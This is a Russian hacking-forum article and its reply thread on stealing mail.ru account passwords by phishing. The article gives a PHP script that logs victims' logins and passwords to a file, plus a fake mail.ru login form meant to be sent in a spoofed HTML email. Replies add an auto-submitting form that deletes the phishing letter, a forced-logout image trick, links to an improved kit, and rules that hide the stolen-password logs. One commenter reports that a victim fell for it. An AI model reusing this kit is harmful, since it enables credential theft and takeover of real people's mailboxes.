Авторские статьи Взлом почты на mail.ru [СИ]

[::.INTRO.::]​

Привет! В этой небольшой статье я расскажу о том, как взломать ящик на mail.ru.
Статья предназначена в первую очередь для новичков, в СИ(социальной инженерии ), а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику ", сами поймете.

[::.ACTION.::]​

Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих(фейки/скамы там соотв. не приветсвуются):
*только заранее убедитесь что хостинг поддерживает PHP

Code:

km.ru 
nextmail.ru 
hobby.ru 
webrise.ru 
lapin.ru 
free.dl-hosting.ru 
hostow.net 
beplaced.ru 
777host.ru 
paltus.ru 
miraclehost.ru 
freebox.ru 
alfaspace.net 
k70.ru 
hosting.promostudio.ru 
chat.ru 
maxhost.ru 
nixup.com 
e2e.ru 
noka.ru 
newmail.ru 
boom.ru 
h15.ru 
hut.ru 
jino-net.ru 
pochta.ru 
unlimhost.ru 
onepage.ru 
by.ru 
sbn.bz 
yard.ru 
domainhosting.ru 
orthodoxy.ru 
webservis.ru 
ru-web.net 
activehost.ru 
househost.ru 
bestof.ru 
addr.ru 
hosting.dump.ru 
pesni.ru 
medbox.ru 
fatal.ru 
x5x.ru 
hopshot.com 
5gigs.com 
wagoo.com 
orgfree.com 
awardspace.com 
bobos.ca 
www.host.sk 
zportal.info 
spaceall.de 
3x.ro 
sretenie.ru 
dotgeek.org 
sevhosting.net 
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru 
chat.ru 
boom.ru 
by.ru

После регистрации:
Во-первых, нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):

PHP:

<?php
error_reporting(0);
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312");


Рассмотрим скрипт поподробнее:

PHP:

header("Location: http://win.mail.ru/cgi-bin/readmsg?id=121112312");

Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке.

• Сохраним в файл mes.php и зальем на хостинг.

• Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777, что позволит нам записывать логины в файл.

Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:

PHP:

<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адрес фейка/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td> 
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>

<tr> 
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>

Укажите в параметре action тега form - адресс вашего сайта,который вы зарегистрировали выше, и путь к снифферу mes.php.
[!] Надо обратить внимание на то, что данные должны передоваться методом "GET", Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адреса.
Сделать это можно, например тут:

Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва введет свои логин и пароль, то вам повезло.
Узнать пароли вы сможете в файле mail.txt.

[::.END.::]​

 

видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)

 

в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка

 

А как же это?

 

так дополняй скорее свою статью

 

Статья не супер, но из-за таких как вы, считающих себя гуру, новые статьи редко пишутся! Людям просто не хочется писать статьи во избежании такой тупой критики... Что это за аргумент? -ерунда, говно и т.д. Напиши свой способ.
Сам сталкивался с такой штукой, пишешь статью, а ее удаляют. Причиной назвали сложность осуществления предложенного метода... Я чуть под стол не упал...
Я считаю не нужно отбивать у людей желание писать, хоть что то...

 

Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.

 

XSS или XSS + ФЕЙК ...

 

ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...

 

А я соглашусь с ufoPlast, все он правильно сказал.

 

ИМХО, СИ легче юзать на Яндексе.
Поясню:
- Отсутствуют какие-либо предупреждения по поводу того что пароль можно украсть
- Однако присутствуют условия при реге мыла (нельзя регистрировать мыло с вставкой admin, support, yandex). Но это легко обойти... Можно зарегать мыло типа emailhelp, emailbot и тд

Вообщем мну предпочитает яндекс.
Хотя мэйл тоже слабо защищен...

 

а что мешает "анонимно" послать мыло от [email protected] ?

 

Тема немного старовата, но я вставлю свои 5 копеек
1)Зачем передовать всё через GET это палевно, меняем на POST и всё.
2)Зачем перенаправлять юзера на непонятное письмо http://win.mail.ru/cgi-bin/readmsg?id=121112312 если мы можем посмотреть refer и отправить его обратно на наше письмо, но ябы селал подругому...

Из рефера получаем ID письма (буду помечать его как messid), в фрейме грузим
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid
это перенесёт письмо в корзину, потом вызываем
http://win.mail.ru/cgi-bin/movemsg?remove&id=messid&confirm=on
Это спросит хотимли мы удалить навсегда письмо?
Дальше вот такая форма

HTML:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1250" />
<title>x3k</title>
</head>
<body onload="pe4enkiiiii.submit()">
<form action="http://win.mail.ru/cgi-bin/movemsg" method="POST" name="pe4enkiiiii">
<input type="hidden" name="confirm" value="on">
<input type="hidden" name="remove" value="1">
<input type="hidden" name="id" value="[COLOR=Red]messid[/COLOR]">
</form>
</body>
</html>

Это сносит письмо насмерть
Дальше в фрейме вызываем http://win.mail.ru/cgi-bin/logout это выход с ящика, потом перенаправляем юзера на http://win.mail.ru/cgi-bin/login
Всё, юзверь думает ошибся пассом, заходит, письма нет, ну и *** с ним

Не тестировал, токо частично, должно работать...
Протестировал, работает
=============
ОУ! Даже знаете чо делаем... После того как юзверь прищёл к нам на скрипт делаем 2 фрейма, первый 100% http://win.mail.ru/cgi-bin/msglist второй 0% где и будут происходить наши действия, этож ваще безпалевно

 

молодец, уделил время, написал. ну, что - + вообщем

 

Немного доработал скрипт, качать отсюда: http://slil.ru/26028341 (пасс antichat) эту не качай, качай на 2 поста ниже, там 2 версия

В скрипте 5 файлов
index.php - скрипт, записывающий инфу в логи
frame.php - скрипт, удаляющий письмо
log.txt - подробный лог
minilog.txt - пишется мыло и пасс
readme.html - инструкция с HTML кодом который надо отсылать

В общем заливаем скрипты куда-то, читаем readme редактируем HTML код под себя (для нубов: Чтоб отправить HTML в письме через mail.ru, нмакаем "Написать письмо" там жмакаем "Расширенный формат" вставляем HTML, отправляем) тама отредактировать 1 строку надо - ссылку на сниффер

Чел открывает письмо, тама месага типо скриптое письмо, введите логин и пасс, форма очень очень поломаная, но не я её писал, вопросы к ТСу
Так вот, чел пишет логин пасс, нажимает вход, логин и пасс идёт нам на скрипт, скрипт записывает логи и пасс в лог, при этом грузятся 2 фрейма, 1 фрейм взод на mail.ru, 2 фрейм получает от скрипта номер письма и 4 раза пытается его удалить (достаточно 2 но бывают лаги) после того как скрипт провёл свои грязные дела он перекидывает пользователя на почту, в которой от письма не осталось и следа и логи и пароль остались у нас, круто, да?

P.S> Впервые этим занимаюсь и просто от нечего делать
=========
Гы гы, чел в аське повёлся Мля, а это работает оказывается ))
Кстате в .htaccess пропишите

Code:

<files "log.txt">
order allow,deny
deny from all
</files>
<files "minilog.txt">
order allow,deny
deny from all
</files>

Ато не кайф если логи прочитают

 

понч впринципе неплохо- маленькое дополнение- можно там еще прикрутить снифер- да куки мы неполучим-Но мы точно будем знать открыл ли пользователь наше письмо или он еще в свой ящик незаходил, кстати пользовался- когда снифер от GreenBear был живой и точно знал айпишку- открывшего письмо и забила ли жертва хрен на наш суперфейк))) и стоит ли от нее ждать пассов)))

 

Сделал, http://slil.ru/26028567 пасс antichat
Это так сказать версия 2.0 но как это называется я хз Сами придумайе название
+При открытии письма мы узнаем об этом
+В инструкцию добавлен javascript, чтоб дого не копаться
+Добавлен .htaccess чтоб сами не разбирались что там и куда
=====================
Я кстати с год назад придумал и отписал тута новый способ прикола над форумчанами, там вот он и на mail.ru покатит, отсылаем письмо

<h1>Ты грязный овце*б </h1>
<img src="http://win.mail.ru/cgi-bin/logout">

Такое западло Но можно будет удалить письмо из списка

 

Пару слов скажу.
1. если картитки отключены, то не работает HTTP_REFERER, соответственно письмо не удаляется.
2. Может я чего не понял, но временно открывается новое окно http://fake.ru/index.php, а его ни как нельзя сделать размерами 0х0 ?

 

Расскажите пожалуйста, как отправить в формате HTML и с какого ящика (то есть майл рамблер). Пробывал отправлять с клиента The Bat в HTML (ставил формат письма HTML)? но приходит письмо и в нем тупо HTML тэги то етсь не обрабатываеться как код. Прошу помощи.

 

Дело в том что твой код отправляется как txt
Не морочь себе голову и используй скрипт(отправил в личку)